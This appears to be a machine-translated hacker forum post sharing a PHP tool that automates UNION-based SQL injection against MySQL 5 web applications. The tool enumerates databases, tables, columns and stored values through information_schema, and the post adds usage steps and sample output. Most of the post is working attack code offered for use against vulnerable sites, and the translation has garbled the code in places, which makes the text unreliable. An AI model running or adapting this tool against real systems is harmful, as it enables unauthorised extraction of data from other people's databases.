Author: mika from: Evil baboons
After mysql version 5 is released, the injection vulnerability is easier to use than before, and can be directly exploited like mssql (or even easier than mssql, the mssql brute-force attack requires an error prompt to be enabled. If the error prompt is disabled, brute-force Guesses are required, mysql, as long as you find the injection point, as long as you can union any field that can be displayed on the page ). Since I read flyh4t's article "Mysql5 injection tips summary", I have been trying to test it. As a result, I found many sites have updated to this version, so the test is not easy to call ~~~ In order to save effort, it is natural to use the knowledge you have learned to write a simple tool for automatic brute force acquisition, which is much easier than manual writing. I think many of my friends may need such tools. Although I have found the latest pangolin on the Internet, the test results are not satisfactory. It's easy to use it. In fact, the Code has no technology, but in the spirit of sharing, it is a tool for everyone. Don't laugh at me.
The tool is written in php (because it is easy to write). The Code is as follows:
<? Php
Error_reporting (7 );
Echo "Mysql ver 5 SQL injection exploitercoded by Mika [EST]";
If ($ argc> 7 | $ argc <2)
{
Echo <INFO
Usage: $ argv [0]-t [table] [-f <field>-c [condition]
INFO;
Die;
}
//************************************** **************************************
$ Url = "http://www.vul.com/display_msg.php? Id = 432% 20and % 201 = 2% 20 union % 20 select %, 5, MIKA_MIKA ";
$ Db_name = "vuldb ";
//************************************** **************************************
$ Curl = curl_init ();
Curl_setopt ($ curl, CURLOPT_HEADER, 0 );
Curl_setopt ($ curl, CURLOPT_RETURNTRANSFER, 1 );
Curl_setopt ($ curl, CURLOPT_PROXY, "Fig: 8080 ");
Function find_value ($ url ){
Global $ curl;
// Echo $ url ."";
Curl_setopt ($ curl, CURLOPT_URL, $ url );
$ Content = curl_exec ($ curl );
// Echo $ content;
$ Re = preg_match ("/(|. +? |)/I ", $ content, $ result );
// Echo $ content;
If ($ re)
{
// Return str_replace (|, $ result [1]);
Return $ result [1];
}
Return 0;
}
Function str2ascii ($ str ){
$ Temp = "char (";
For ($ I = 0; $ I <strlen ($ str)-1; $ I ++ ){
// Echo $ str [$ I]. "";
$ Temp. = ord ($ str [$ I]).,;
}
$ Temp. = ord ($ str [strlen ($ str)-1]).);
// Echo $ temp ."";
Return $ temp;
}
Function exploit_db (){
Global $ url, $ curl;
$ New_url = str_replace (MIKA_MIKA, concat (0x7C7C, SCHEMA_NAME, 0x7C7C), $ url );
$ New_url. = "% 20 from % 20information_schema.SCHEMATA % 20 limit % 20MIKA_MIKA, 1 /*";
$ I = 0;
Echo "DATABASES :";
Do {
$ New = str_replace (MIKA_MIKA, $ I, $ new_url );
If ($ v1 = find_value ($ new ))
Echo $ v1 ."";
$ I ++;
} While ($ v1 );
}
Function exploit_tab (){
Global $ url, $ db_name, $ curl;
$ New_url = str_replace (MIKA_MIKA, concat (0x7C7C, TABLE_NAME, 0x7C7C), $ url );
$ New_url. = "% 20 from % 20information_schema.TABLES % 20 where % 20TABLE_SCHEMA =". str2ascii ($ db_name). "% 20 limit % 20MIKA_MIKA, 1 /*";
Echo "Tables of database". strtoupper ($ db_name ).":";
$ I = 0;
Do {
$ New = str_replace (MIKA_MIKA, $ I, $ new_url );
If ($ v1 = find_value ($ new ))
Echo $ v1 ."";
$ I ++;
} While ($ v1 );
}
Function exploit_field (){
Global $ table_name, $ url, $ curl;
$ New_url = str_replace (MIKA_MIKA, concat (0x7C7C, COLUMN_NAME, 0x7C7C), $ url );
$ New_url. = "% 20 from % 20information_schema.COLUMNS % 20 where % 20TABLE_NAME =". str2ascii ($ table_name). "% 20 limit % 20MIKA_MIKA, 1 /*";
$ I = 0;
Echo "columns of table". strtoupper ($ table_name ).":";
Do {
$ New = str_replace (MIKA_MIKA, $ I, $ new_url );
If ($ v1 = find_value ($ new ))
Echo $ v1 ."";
$ I ++;
} While ($ v1 );
}
Function exploit_value ($ mode = 0 ){
Global $ db_name, $ table_name, $ field_name, $ condition, $ url, $ curl;
$ New_url = str_replace (MIKA_MIKA, concat (0x7C7C, MIKA_MIKA, 0x7C7C), $ url );
If ($ mode)
{
$ New_url. = "% 20 from % 20 $ db_name. $ table_name % 20 where % 20 $ condition /*";
$ New = str_replace (MIKA_MIKA, $ field_name, $ new_url );
$ V1 = find_value ($ new );
Echo $ v1 ."";
Return;
}
$ New_url. = "% 20 from % 20 $ db_name. $ table_name % 20 limit % 20MIKA_NUM, 1 /*";
$ New_url = str_replace (MIKA_MIKA, $ field_name, $ new_url );
$ I = 0;
Echo "$ field_name values of table". strtoupper ($ table_name ).":";
Do {
$ New = str_replace (MIKA_NUM, $ I, $ new_url );
If ($ v1 = find_value ($ new ))
Echo $ v1 ."";
$ I ++;
} While ($ v1 );
}
Switch ($ argc ){
Case 2:
If ($ argv [1] =-t)
Exploit_tab ();
If ($ argv [1] =-d)
Exploit_db ();
Break;
Case 3:
$ Table_name = $ argv [2];
Exploit_field ();
Break;
Case 5:
Case 6:
$ Table_name = $ argv [2];
$ Field_name = $ argv [4];
Exploit_value ();
Break;
Case 7:
$ Table_name = $ argv [2];
$ Field_name = $ argv [4];
$ Condition = $ argv [6];
Exploit_value (1 );
Break;
}
?>
The code is very simple, and it saves a lot of effort, just a very rough version, how is it convenient. However, it is enough to obtain the field value. Let me explain it briefly:
The parameters between two/********* need to be directly modified in the Code. Because it is too long, it is too troublesome to change the parameters under the command line, so it is better to put the Code directly. Among them, $ url is obviously a vulnerable url, which needs to be connected together, as shown in the Code, as follows:
Http://www.vul.com/display_msg.p... 0 union % 20 select % ,,2, 3, 4, 5, 6, 7, 8
For example, if 6th numbers are displayed on the page, you can replace number 6 with "MIKA_MIKA" and do not end up with a annotator (because the program will automatically add it when submitting the Code ), the final url is as follows:
$ Url = "http://www.vul.com/display_msg.php? Id = 432% 20and % 201 = 2% 20 union % 20 select %, 5, MIKA_MIKA ";
In addition, $ db_name is the database name. You can obtain it directly using the database () function and enter it here.
You can use it after filling it out, which is very simple. Open cmd and switch to the directory where the program is located. For example, you can use the following command to obtain all databases:
F: scriptsphpmine> php mysql5.php-d
Mysql ver 5 SQL injection exploiter
Coded by Mika [EST]
DATABASES:
| Information_schema |
| Vuldb |
Brute force Table Name:
F: scriptsphpmine> php mysql5.php-t
Mysql ver 5 SQL injection exploiter
Coded by Mika [EST]
Tables of database VULDB:
| Articles |
| Audio |
.
.
.
Omitted
.
.
.
Brute force field name:
F: scriptsphpmine> php mysql5.php-t Articles
Mysql ver 5 SQL injection exploiter
Coded by Mika [EST]
Columns of table ARTICLES:
| ID |
| Article_ID |
| Title |
| Type |
.
.
.
Omitted
.
.
.
Brute force value:
F: scriptsphpmine> php mysql5.php-t Articles-f Type
Mysql ver 5 SQL injection exploiter
Coded by Mika [EST]
Type values of table ARTICLES:
| 2 |
| 1 |
.
.
.
Omitted
.
.
.
In addition, if you want to add your own conditions, you can add the-c parameter at the end and then keep up with the where condition (do not include where), for example:
F: scriptsphpmine> php mysql5.php-t Articles-f ID-c Type = 2
Mysql ver 5 SQL injection exploiter
Coded by Mika [EST]
| 58 |
The program is very simple, but the basic functions are available. I just want to know which one to write, so I will share with you any improvements in the future. Errors and improvements are inevitable in the Code. Please help us to modify them. In addition, the Code contains this line:
Curl_setopt ($ curl, CURLOPT_PROXY, "Fig: 8080 ");
This is to use the proxy. If you do not need it, comment it out.
Statement: reposted must be complete. In addition, I really hope that everyone will not be too stingy. I hope to share my code with you even if I have added some modifications.